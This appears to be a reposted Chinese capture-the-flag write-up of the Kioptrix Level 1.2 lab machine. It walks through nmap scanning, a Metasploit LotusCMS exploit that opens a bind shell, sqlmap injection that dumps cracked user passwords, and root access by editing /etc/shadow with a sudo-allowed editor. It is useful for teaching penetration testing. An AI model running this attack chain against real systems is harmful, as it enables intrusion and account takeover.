[vulnhub]Kioptrix: Level 1.2 (#3)

news2024/10/30 12:15:53

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是169

    nmap -sP 192.168.75.0/24                
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00031s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00029s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.169
    Host is up (0.00052s latency).
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00021s latency).
    MAC Address: 00:50:56:EC:C5:A4 (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.0010s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    
  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p22,80 192.168.75.169     
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:19 CST
    Nmap scan report for 192.168.75.169
    Host is up (0.00044s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p22,80 192.168.75.169
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:20 CST
    Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:22 (0:00:02 remaining)
    Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.52% done; ETC: 13:23 (0:00:02 remaining)
    Nmap scan report for 192.168.75.169
    Host is up (0.00027s latency).
    
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    |     http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
    |_    http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_      http://ha.ckers.org/slowloris/
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    |_http-trace: TRACE is enabled
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.169
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.169:80/gallery/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin
    |     Form id: contactform
    |     Form action: index.php?system=Admin&page=loginSubmit
    |     
    |     Path: http://192.168.75.169:80/gallery/gadmin/
    |     Form id: username
    |     Form action: index.php?task=signin
    |     
    |     Path: http://192.168.75.169:80/gallery/index.php
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Blog&post=1281005380
    |     Form id: commentform
    |     Form action: 
    |     
    |     Path: http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit
    |     Form id: contactform
    |_    Form action: index.php?system=Admin&page=loginSubmit
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /phpmyadmin/: phpMyAdmin
    |   /cache/: Potentially interesting folder
    |   /core/: Potentially interesting folder
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
    |_  /style/: Potentially interesting folder
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    MAC Address: 00:0C:29:D1:B8:48 (VMware)
    

WEB渗透

  1. 访问主页

    在这里插入图片描述

  2. 扫描目录

    dirsearch -u 192.168.75.169 -x 403
    //
    [13:31:06] Starting:                                                                                                                                                                                              
    [13:31:27] 301 -  355B  - /cache  ->  http://192.168.75.169/cache/          
    [13:31:31] 301 -  354B  - /core  ->  http://192.168.75.169/core/            
    [13:31:31] 200 -  688B  - /core/fragments/moduleInfo.phtml
    [13:31:36] 200 -   23KB - /favicon.ico                                      
    [13:31:37] 301 -  357B  - /gallery  ->  http://192.168.75.169/gallery/      
    [13:31:47] 301 -  357B  - /modules  ->  http://192.168.75.169/modules/      
    [13:31:47] 200 -    2KB - /modules/                                         
    [13:31:52] 301 -  360B  - /phpmyadmin  ->  http://192.168.75.169/phpmyadmin/
    [13:31:53] 401 -  520B  - /phpmyadmin/scripts/setup.php                     
    [13:31:53] 200 -    8KB - /phpmyadmin/                                      
    [13:31:53] 200 -    8KB - /phpmyadmin/index.php                             
    [13:32:03] 301 -  355B  - /style  ->  http://192.168.75.169/style/          
    [13:32:08] 200 -   18B  - /update.php    
    
    • /modules 像是文件服务器
    • /phpmyadmin phpmyadmin
    • /update.php 提示permission denied.
    • index.php?system=Admin 是登陆页面
  3. 登陆页面发现是CMS是LotusCMS 查阅有没有可以利用漏洞

    • 看见ruby后缀利用文件,上msf搜索看看

      # searchsploit LotusCMS    
      //
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
       Exploit Title                                                                                                                                                                  |  Path
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)                                                                                                                   | php/remote/18565.rb
      LotusCMS 3.0.3 - Multiple Vulnerabilities                                                                                                                                       | php/webapps/16982.txt
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      
    • 进入msf控制台,进行搜索,应该就是searchsploit 搜索出来的那个

      msf6 > search LotusCMS
      
      Matching Modules
      ================
      
         #  Name                              Disclosure Date  Rank       Check  Description
         -  ----                              ---------------  ----       -----  -----------
         0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution
      
    • 尝试利用

      msf6 > use exploit/multi/http/lcms_php_exec 
      msf6 exploit(multi/http/lcms_php_exec) > set rhosts 192.168.75.169
      rhosts => 192.168.75.169
      msf6 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin
      uri => /index.php?system=Admin
      msf6 exploit(multi/http/lcms_php_exec) > run
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      

      死活不成功,尝试换一下payload

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php 
      payload => php/reverse_php
      

      尝试了几个payload后发现php/bind_perl 可以使用

      msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_perl 
      payload => php/reverse_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Started reverse TCP handler on 192.168.75.151:4444 
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      msf6 exploit(multi/http/lcms_php_exec) > set payload php/bind_perl
      payload => php/bind_perl
      msf6 exploit(multi/http/lcms_php_exec) > run
      
      [*] Using found page param: /index.php?page=index
      [*] Sending exploit ...
      [*] Started bind TCP handler against 192.168.75.169:4444
      [*] Command shell session 1 opened (192.168.75.151:34319 -> 192.168.75.169:4444) at 2024-10-29 14:08:36 +0800
      whoami
      www-data
      

提权

  1. 查看权限

    python -c "import pty;pty.spawn('/bin/sh')"
    //
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    //
    $ uname -a
    Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
    //
    $ whoami
    www-data
    
  2. 寻找突破口

    • suid提权寻找

      $ find / -perm -u=s -type f 2>/dev/null
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/openssh/ssh-keysign
      /usr/lib/apache2/suexec
      /usr/lib/pt_chown
      /usr/bin/arping
      /usr/bin/mtr
      /usr/bin/newgrp
      /usr/bin/chfn
      /usr/bin/gpasswd
      /usr/bin/sudo
      /usr/bin/at
      /usr/bin/sudoedit
      /usr/bin/chsh
      /usr/bin/passwd
      /usr/bin/traceroute6.iputils
      /usr/local/bin/ht
      /usr/sbin/pppd
      /usr/sbin/uuidd
      /lib/dhcp3-client/call-dhclient-script
      /bin/fusermount
      /bin/ping
      /bin/mount
      /bin/umount
      /bin/ping6
      /bin/su
      
    • /etc/phpmyadminconfig.inc.php存在数据库账号密码,尝试但是登陆失败

      // $cfg['Servers'][$i]['controluser'] = 'pma';
      // $cfg['Servers'][$i]['controlpass'] = 'pmapass';
      
    • 寻找敏感文件,在/home/loneferret 存在一个CompanyPolicy.README 文件

      # CompanyPolicy.README
      Hello new employee,
      It is company policy here to use our newly installed software for editing, creating and viewing files.
      Please use the command 'sudo ht'.
      Failure to do so will result in you immediate termination.
      
      DG
      CEO
      

      但是sudo ht需要密码,继续寻找别的方法

web渗透 2

  1. 才知道我的靶机有问题,访问gallery/ 会加载不完全,被浏览器自动拦截了很多内容。

    在这里插入图片描述

  2. 取消拦截后就好了

  3. 发现 http://kioptrix3.com/gallery/gallery.php?id=1 有个可能存在sql注入的地方,使用sqlmap检测是否存在sql注入

    # 结果
    [19:07:04] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    web application technology: PHP 5.2.4, Apache 2.2.8, PHP
    back-end DBMS: MySQL >= 5.0.12
    [19:07:05] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 23 times
    [19:07:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'
    

    存在sql注入,继续使用sqlmap来爆破剩余的数据

    最后dump下两行数据,是两个用户

    +----+---------------------------------------------+------------+
    | id | password                                    | username   |
    +----+---------------------------------------------+------------+
    | 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
    | 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
    +----+---------------------------------------------+------------+
    
  4. 使用爆破出来的用户去尝试登陆 ssh,loneferret成功登入

提权 2

  1. 查看权限

    loneferret@Kioptrix3:~$ sudo -l
    User loneferret may run the following commands on this host:
        (root) NOPASSWD: !/usr/bin/su
    	    (root) NOPASSWD: /usr/local/bin/ht
    

    ht拥有sudo权限,根据之前发现的内容知道ht可以编辑文件,并且拥有sudo权限

  2. 尝试修改shadow文件

    loneferret@Kioptrix3:~$ sudo ht /etc/shadow
    Error opening terminal: xterm-256color.
    

    报错了:Error opening terminal: xterm-256color. ,需要加上

    export TERM=xterm
    
  3. 直接将当前用户的密码覆盖到root上去,F3好像是编辑,F2保存,ctrl + c退出

    在这里插入图片描述

  4. 然后ssh登录root账户,提权成功

    loneferret@Kioptrix3:~$ su root
    Password:                                                                                                                                                                                                         
    root@Kioptrix3:/home/loneferret# 
    

    读取flag文件

    root@Kioptrix3:~# cat Congrats.txt 
    //
    Good for you for getting here.                                                                                                                                                                                    
    Regardless of the matter (staying within the spirit of the game of course)                                                                                                                                        
    you got here, congratulations are in order. Wasn't that bad now was it.                                                                                                                                           
                                                                                                                                                                                                                      
    Went in a different direction with this VM. Exploit based challenges are
    nice. Helps workout that information gathering part, but sometimes we
    need to get our hands dirty in other things as well.
    Again, these VMs are beginner and not intented for everyone. 
    Difficulty is relative, keep that in mind.
    
    The object is to learn, do some research and have a little (legal)
    fun in the process.
    
    I hope you enjoyed this third challenge.
    
    Steven McElrea
    aka loneferret
    http://www.kioptrix.com
    
    Credit needs to be given to the creators of the gallery webapp and CMS used
    for the building of the Kioptrix VM3 site.
    
    Main page CMS: 
    http://www.lotuscms.org
    
    Gallery application: 
    Gallarific 2.1 - Free Version released October 10, 2009
    http://www.gallarific.com
    Vulnerable version of this application can be downloaded
    from the Exploit-DB website:
    http://www.exploit-db.com/exploits/15891/
    
    The HT Editor can be found here:
    http://hte.sourceforge.net/downloads.html
    And the vulnerable version on Exploit-DB here:
    http://www.exploit-db.com/exploits/17083/
    
    Also, all pictures were taken from Google Images, so being part of the
    public domain I used them.
    
    root@Kioptrix3:~# 
    
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2227984.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

iQOO手机怎样将屏幕投射到MacBook?可以同步音频吗?

众所周知,苹果品牌的设备自己有AirPlay的投屏功能,iPhone要投屏到MacBook只要连接同一网络,然后开启AirPlay就可以投屏。但其他品牌的手机没有AirPlay,怎么将手机屏幕投射到MacBook呢? 安卓系统的手机可以使用无线投屏…

C++初阶(七)--类和对象(4)

目录 ​编辑 一、再谈构造函数 1.构造函数体赋值 2.初始化列表 二、类型转换 1.隐式类型转换 2.explicit关键字 3.类类型之间的对象隐式转换 三、static成员函数 1.概念 2.特性 3.面试题: 四、友元函数 1.基本介绍 2.回顾: 3.友元类&am…

【水下生物数据集】 水下生物识别 深度学习 目标检测 机器视觉 yolo(含数据集)

一、背景意义 随着全球海洋生态环境的日益变化,水下生物的监测和保护变得愈发重要。水下生物种类繁多,包括螃蟹、鱼类、水母、虾、小鱼和海星等,它们在海洋生态系统中扮演着关键角色。传统的水下生物监测方法通常依赖于人工观察,效…

QT相机连接与拍照

先看效果 初始化 auto mainLayout new QHBoxLayout(this);m_viewfinder new QCameraViewfinder(this);m_viewfinder->setStyleSheet("border-radius: 20px;background-color:rgb(43,48,70)");mainLayout->addWidget(m_viewfinder,8); 选择相机 void camera…

uniapp position: fixed 兼容性不显示问题

position: fixed; bottom: 0;以上运行到微信小程序时正常,但是h5会出现不显示的问题。 解决方法 修改为: position: fixed; bottom: var(--window-bottom, 0);

数据库数据恢复—Oracle ASM磁盘组掉线 ,ASM实例无法挂载的数据恢复案例

Oracle数据库数据恢复环境&故障: Oracle ASM磁盘组由4块磁盘组成。Oracle ASM磁盘组掉线 ,ASM实例不能mount。 Oracle数据库故障分析&恢复方案: 数据库数据恢复工程师对组成ASM磁盘组的磁盘进行分析。对ASM元数据进行分析发现ASM存储…

基于 NXP iMX8MP 平台简单测试 PySide6 应用

By Toradex秦海 1). 简介 Python binding 的 Qt GUI 库一直以来有两种,最初是由 Riverbank Computing 公司在 2000 年初发布,基于 Qt4 版本推出的 PyQt4,后来随着 Qt 库版本的演进也陆续跟进到 PyQt5 和最新的 PyQt6,由于发布的…

如何从iconfont中获取字体图标并应用到微信小程序中去?

下面我们一一个微信小程序的登录界面的制作为例来说明,如何从iconfont中获取字体图标是如何应用到微信小程序中去的。首先我们看效果。 这里所有的图标,都是从iconfont中以字体的形式来加载的,也就是说,我们自始至终没有使用一张…

「Mac畅玩鸿蒙与硬件14」鸿蒙UI组件篇4 - Toggle 和 Checkbox 组件

在鸿蒙开发中,Toggle 和 Checkbox 是常用的交互组件,分别用于实现开关切换和多项选择。Toggle 提供多种类型以适应不同场景,而 Checkbox 支持自定义样式及事件回调。本篇将详细介绍这两个组件的基本用法,并通过实战展示它们的组合应用。 关键词 Toggle 组件Checkbox 组件开…

Axure设计之多级菜单导航教程(中继器)

在数字化时代,优化产品设计,提升用户界面交互,是产品设计着重考虑的点。针对传统菜单导航复杂繁琐的问题,本设计提出了一套灵活的菜单导航方案,结合中继器与动态面板,实现一键搜索、菜单收藏、多级菜单导航…

基于uniapp微信小程序的旅游系统

作者:计算机学姐 开发技术:SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等,“文末源码”。 专栏推荐:前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码 精品专栏:…

SpringBoot篇(自动装配原理)

目录 一、自动装配机制 1. 简介 2. 自动装配主要依靠三个核心的关键技术 3. run()方法加载启动类 4. 注解SpringBootApplication包含了多个注解 4.1 SpringBootConfiguration 4.2 ComponentScan 4.3 EnableAutoConfiguration 5. SpringBootApplication一共做了三件事 …

Python 爬虫的寻宝大冒险:如何捕获 API 数据的宝藏

在这个信息爆炸的数字时代,数据就像是隐藏在网络深处的宝藏,等待着勇敢的探险家去发现。今天,我们要讲述的是如何成为一名 Python 爬虫探险家,装备你的代码工具,深入 API 的迷宫,捕获那些珍贵的数据宝藏。 …

blender雕刻基础 笔记

一、教学视频来源 案例5:荧光树桩_雕刻基础_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Bt4y1E7qn/?p18&share_sourcecopy_web&vd_sourced9dc363bbfe0ac72dbaa04823c59231e 二、笔记 1. 启动blender的雕刻模式 启动雕刻模式有两种方式&#x…

NVR小程序接入平台/设备EasyNVR多个NVR同时管理多平台级联与上下级对接的高效应用

政务数据共享平台的建设正致力于消除“信息孤岛”现象,打破“数据烟囱”,实现国家、省、市及区县数据的全面对接与共享。省市平台的“级联对接”工作由多级平台共同构成,旨在满足跨部门、跨层级及跨省数据共享的需求,推动数据流通…

利用Kubernetes原生特性实现简单的灰度发布和蓝绿发布

部分借鉴地址: https://support.huaweicloud.com/intl/zh-cn/bestpractice-cce/cce_bestpractice_10002.html 1.原理介绍 用户通常使用无状态负载 Deployment、有状态负载 StatefulSet等Kubernetes对象来部署业务,每个工作负载管理一组Pod。以Deployment为例&#x…

江协科技STM32学习- P25 UART串口协议

🚀write in front🚀 🔎大家好,我是黄桃罐头,希望你看完之后,能对你有所帮助,不足请指正!共同学习交流 🎁欢迎各位→点赞👍 收藏⭐️ 留言📝​…

【c语言】运算符汇总(万字解析)

🌟🌟作者主页:ephemerals__ 🌟🌟所属专栏:C语言 目录 前言 一、c语言运算符的分类 二、各运算符的功能及使用 1. 算数运算符 - * / % 2. 位运算符 二进制和进制转换 二进制转十进制 十进制…

使用Python和OpenCV实现火焰检测

使用Python和OpenCV实现火焰检测 项目解释: 此 Python 代码是使用 OpenCV、线程、声音和电子邮件功能的火灾探测系统的简单示例。 以下是它的功能的简单描述: 导入库:代码首先导入必要的库: cv2:用于图像和视频处理…

Flink on yarn模式下,JobManager异常退出问题

这个问题排除了很久,其中更换了Flink版本,也更换了Hadoop版本一直无法解决,JobManager跑着跑着就异常退出了。资源管理器上是提示运行结束,运行状态是被Kill掉。 网上搜了一圈,都说内存不足、资源不足,配置…